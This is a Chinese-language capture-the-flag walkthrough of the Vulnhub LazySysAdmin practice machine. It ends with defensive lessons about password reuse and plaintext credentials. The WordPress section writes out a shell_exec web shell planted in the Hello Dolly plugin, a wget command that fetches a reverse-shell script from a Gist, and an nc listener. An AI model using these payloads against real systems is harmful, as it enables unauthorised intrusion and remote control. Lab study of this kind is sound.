Vulnhub-LazySysAdmin 通关指南<\/h1>

背景介绍<\/h2>

LazySysAdmin 是 Vulnhub 上的一个渗透测试靶机，难度为中等\/初学者级别。该靶机旨在：<\/p>

教授初学者基本的 Linux 枚举技巧<\/li>
帮助学习者熟悉 Linux 服务配置<\/li>

最终目标是获取 root 权限并找到 flag<\/li> <\/ol>

关键提示<\/strong>：<\/p>

枚举是关键<\/li>
需要耐心尝试<\/li>
不要错过明显的信息<\/li> <\/ul>
信息收集阶段<\/h2>
网络扫描<\/h3>

使用 netdiscover<\/code> 确定靶机 IP<\/li>
使用 nmap<\/code> 扫描开放端口，发现以下服务： MySQL<\/li> InspIRCd (聊天服务器)<\/li> Samba (Windows 与 UNIX 文件共享服务)<\/li> <\/ul> <\/li> <\/ol> Web 服务枚举<\/h3> 80 端口运行着一个静态 HTML 页面<\/li> 目录扫描发现： phpMyAdmin<\/li> WordPress<\/li> <\/ul> <\/li> <\/ol> WordPress 发现<\/strong>：<\/p> 用户名：admin<\/li> 主题：twentyfifteen v1.8<\/li> 无插件安装<\/li> 页面中多次重复 "My name is togie"<\/li> <\/ul> Samba 服务利用<\/h3> 发现两个共享：<\/p> printf$<\/code> (打印机，无法连接)<\/li> share$<\/code> (可访问的共享文件夹)<\/li> <\/ul> <\/li> 在共享文件夹中发现 WordPress 站点目录，可以下载文件<\/p> <\/li> <\/ol> 关键文件<\/strong>：<\/p> deets.txt<\/code> 内容： CBF Remembering all these passwords. Remember to remove this file and update your password after we push out the server. Password 12345 <\/code><\/pre> <\/li> <\/ul> 攻击路径一：SSH 直接登录<\/h2> 尝试使用用户名 togie<\/code> 和密码 12345<\/code> 登录 SSH<\/p> 成功登录，但发现是受限 shell (rbash)<\/li> <\/ul> <\/li> 检查 sudo 权限：<\/p> sudo su <\/span><\/span><\/code><\/pre> 使用相同密码成功提权到 root<\/li> <\/ul> <\/li> 获取 flag<\/p> <\/li> <\/ol> 注意<\/strong>：这可能是非预期解，体现了"懒惰管理员"的主题<\/p> 攻击路径二：WordPress 渗透<\/h2> 数据库凭证获取<\/h3> 从 WordPress 配置文件 wp-config.php<\/code> 中获取数据库凭证<\/p> <\/li> 尝试通过 phpMyAdmin 写 shell，但发现功能受限<\/p> <\/li> <\/ol> WordPress 管理员登录<\/h3> 尝试使用数据库密码作为 WordPress 管理员密码<\/p> 成功登录 WordPress 后台<\/li> <\/ul> <\/li> 通过修改插件代码实现 RCE：<\/p> 编辑 "Hello Dolly" 插件，添加代码： $lyrics =<\/span> "<pre>"<\/span>.<\/span>shell_exec<\/span>($_GET['cmd'<\/span>]).<\/span>"<\/pre>"<\/span>; <\/span><\/span>return<\/span> wptexturize<\/span>($lyrics); <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 通过 Web 执行命令：<\/p> http:\/\/靶机IP\/wordpress\/wp-admin\/index.php?cmd=whoami <\/code><\/pre> <\/li> <\/ol> 反弹 Shell 建立<\/h3> 上传反弹 shell 脚本 (可通过 Gist 等方式)<\/p> <?<\/span>php<\/span> <\/span><\/span>\/\/ 反弹 shell 代码 <\/span><\/span><\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre><\/li> 使用 wget 下载到靶机：<\/p> ?cmd=wget https:\/\/gist.githubusercontent.com\/...\/rev.php <\/code><\/pre> <\/li> 攻击机监听：<\/p> nc -lnvp 2333<\/span> <\/span><\/span><\/code><\/pre><\/li> 访问 rev.php 获取 shell<\/p> <\/li> 升级为完整 TTY：<\/p> python3 -c 'import pty; pty.spawn("\/bin\/bash")'<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 总结与经验<\/h2> 渗透测试需要多角度尝试，往往有多种攻击路径<\/li> 信息收集阶段至关重要，所有发现都应记录<\/li> 管理员常见错误：密码复用<\/li> 敏感信息明文存储<\/li> 不及时清理临时凭证<\/li> <\/ul> <\/li> 防御建议：定期更换密码<\/li> 严格控制文件权限<\/li> 删除不必要的敏感文件<\/li> 限制 sudo 权限<\/li> <\/ul> <\/li> <\/ol> 技术要点回顾<\/h2> 服务枚举<\/strong>：nmap, dirb\/dirbuster<\/li> Samba 利用<\/strong>：smbclient<\/li> WordPress 测试<\/strong>：WPScan<\/li> 受限 shell 绕过<\/strong>：rbash 限制突破<\/li> Web Shell<\/strong>：通过插件修改实现 RCE<\/li> 权限提升<\/strong>：sudo 滥用<\/li> <\/ol> 通过这个靶机，学习者可以掌握基本的服务枚举、凭证利用和权限提升技巧，理解系统管理员常见的安全疏忽。<\/p>